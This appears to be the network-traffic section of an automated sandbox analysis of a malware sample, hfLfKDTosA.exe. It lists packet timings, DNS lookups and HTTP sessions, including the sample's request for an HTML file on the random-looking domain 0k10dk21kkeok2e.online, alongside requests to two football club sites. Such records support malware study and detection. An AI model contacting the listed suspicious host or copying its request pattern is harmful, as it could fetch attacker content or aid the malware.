                                                                                                                                                                                        Mar 2, 2021 20:41:06.037101030 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037117958 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037184000 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037209034 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037913084 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037944078 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.037961960 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038064003 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038736105 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038758993 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038777113 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038860083 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.038875103 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.039565086 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.039588928 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.039603949 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.039722919 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.040441990 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.040467024 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.040482998 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.040538073 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.040692091 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.041239977 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.041261911 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.041282892 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.041429996 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042104006 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042126894 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042144060 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042203903 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042247057 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.042987108 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.108916998 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109072924 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109097958 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109117031 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109132051 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109148026 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109163046 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109189987 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109242916 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109261990 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109946966 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109976053 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.109992027 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110012054 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110029936 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110044956 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110125065 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110136032 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110173941 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110285044 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110862017 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110884905 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110899925 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110917091 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110934019 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110949993 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.110969067 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111043930 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111058950 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111707926 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111737967 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111754894 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111771107 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111783981 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111797094 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111826897 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111841917 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111846924 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.111892939 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112569094 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112621069 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112648964 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112664938 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112682104 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112698078 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112714052 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112739086 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112755060 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.112761021 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113398075 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113425970 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113445997 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113464117 CET8049729104.21.59.148192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113492966 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.113594055 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:06.299146891 CET4973180192.168.2.699.86.159.103
                                                                                                                                                                                        Mar 2, 2021 20:41:06.343066931 CET804973199.86.159.103192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.343209028 CET4973180192.168.2.699.86.159.103
                                                                                                                                                                                        Mar 2, 2021 20:41:06.343461037 CET4973180192.168.2.699.86.159.103
                                                                                                                                                                                        Mar 2, 2021 20:41:06.384984970 CET804973199.86.159.103192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.386405945 CET804973199.86.159.103192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.512469053 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.554589987 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.554770947 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.555455923 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.576652050 CET4973180192.168.2.699.86.159.103
                                                                                                                                                                                        Mar 2, 2021 20:41:06.597842932 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.599683046 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.599726915 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.599776030 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.599848032 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.603687048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.603842974 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.609329939 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.652663946 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.653300047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:06.668417931 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:06.710447073 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167521000 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167571068 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167593002 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167617083 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167639017 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167659044 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167727947 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.167751074 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.168653011 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.168678045 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.168833971 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.169853926 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.169878006 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.170185089 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.171052933 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.217315912 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244034052 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244061947 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244621992 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244652987 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244725943 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.244752884 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.245866060 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.245903015 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.246454000 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.246999025 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.247030020 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.247278929 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.248276949 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.248303890 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.249468088 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.249497890 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.249573946 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.249593973 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.346113920 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347366095 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347385883 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.347450018 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348057985 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348073006 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.348181963 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.349546909 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.349844933 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350003958 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350913048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.350944042 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351079941 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351845026 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.351883888 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.352010965 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354114056 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354149103 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354363918 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354532003 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354559898 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.354700089 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355784893 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355815887 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.355974913 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.356442928 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.356470108 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.357697964 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358639956 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358669043 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.358773947 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373822927 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373859882 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373878956 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.373925924 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374658108 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374674082 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.374730110 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376193047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376229048 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376252890 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376395941 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.376409054 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378366947 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378402948 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378431082 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.378556013 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381320953 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381355047 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381378889 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381424904 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381552935 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381908894 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381937027 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.381961107 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.382009029 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383344889 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383378983 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383394003 CET4434973299.86.159.29192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383456945 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.383469105 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:07.439899921 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:18.752147913 CET4972980192.168.2.6104.21.59.148
                                                                                                                                                                                        Mar 2, 2021 20:41:18.752886057 CET49732443192.168.2.699.86.159.29
                                                                                                                                                                                        Mar 2, 2021 20:41:18.753184080 CET4973180192.168.2.699.86.159.103

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        Mar 2, 2021 20:41:06.760833025 CET5468353192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:06.809514999 CET53546838.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.458220959 CET5932953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.513892889 CET53593298.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.522399902 CET6402153192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.576818943 CET53640218.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.687927008 CET5612953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.731081963 CET5817753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.746239901 CET53561298.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.754391909 CET5070053192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:07.776822090 CET53581778.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:07.812843084 CET53507008.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:08.897471905 CET5406953192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:08.954718113 CET53540698.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:09.657754898 CET6117853192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:09.706419945 CET53611788.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:18.315679073 CET5701753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:18.539558887 CET53570178.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:18.559680939 CET5632753192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:18.608015060 CET53563278.8.8.8192.168.2.6
                                                                                                                                                                                        Mar 2, 2021 20:41:24.440776110 CET5024353192.168.2.68.8.8.8
                                                                                                                                                                                        Mar 2, 2021 20:41:24.489442110 CET53502438.8.8.8192.168.2.6

                                                                                                                                                                                        DNS Queries


                                                                                                                                                                                        DNS Answers


                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • www.chelseafc.com
                                                                                                                                                                                        • 0k10dk21kkeok2e.online
                                                                                                                                                                                        • www.liverpoolfc.com

                                                                                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49719 | 151.101.2.133 | 80 | C:\Users\user\Desktop\hfLfKDTosA.exe
Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:41:00.988303900 CET | 1084 | OUT | GET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: www.chelseafc.com
                                                                                                                                                                                        Connection: Keep-Alive
Mar 2, 2021 20:41:01.029314995 CET | 1085 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                        Retry-After: 0
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Location: https://www.chelseafc.com/en
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:01 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Powered-By: Curiosity
                                                                                                                                                                                        X-Geo-Country_code: CH


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49729 | 104.21.59.148 | 80 | C:\Users\user\Desktop\hfLfKDTosA.exe
Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:41:05.562596083 CET | 1768 | OUT | GET /base/2930AD689ACFCD5F8337A7469C74A7E8.html HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                        Connection: Keep-Alive
Mar 2, 2021 20:41:05.779750109 CET | 1773 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:05 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: __cfduid=d77cc2a8278ce6d8dce7cd4d435d2570e1614714065; expires=Thu, 01-Apr-21 19:41:05 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                        Last-Modified: Tue, 02 Mar 2021 06:34:34 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        cf-request-id: 08960e6ab700004edf103f2000000001
                                                                                                                                                                                        Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lbbx%2FLsiv0%2Fjj7D1D1ZULW7JJxn9iBnS7UnQE9bZDKMOljcwNg70DxsJ7ORAhILxnFlsbj8gLY5Q%2BzOrn%2FwvNpGDYHe8njW7QhxcU9NnORXLWhdpjKXy"}]}
                                                                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 629d19bdf8d44edf-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49731 | 99.86.159.103 | 80 | C:\Users\user\Desktop\hfLfKDTosA.exe
Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:41:06.343461037 CET | 2316 | OUT | GET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                        Host: www.liverpoolfc.com
                                                                                                                                                                                        Connection: Keep-Alive
Mar 2, 2021 20:41:06.386405945 CET | 2317 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:41:06 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Content-Length: 183
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Location: https://www.liverpoolfc.com/
                                                                                                                                                                                        X-Cache: Redirect from cloudfront
                                                                                                                                                                                        Via: 1.1 41ef3b5e61707f8600cd12eaad85b049.cloudfront.net (CloudFront)
                                                                                                                                                                                        X-Amz-Cf-Pop: MXP64-C2
                                                                                                                                                                                        X-Amz-Cf-Id: YirEnnuzaotXCUkFjgOdgFRznl4kKitKB9Nq-sT3oDxeOIYftwO1oQ==
                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Mar 2, 2021 20:41:06.603687048 CET | 99.86.159.29 | 443 | 192.168.2.6 | 49732 | CN=*.liverpoolfc.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Fri Feb 12 01:00:00 CET 2021 | Mon Mar 14 00:59:59 CET 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
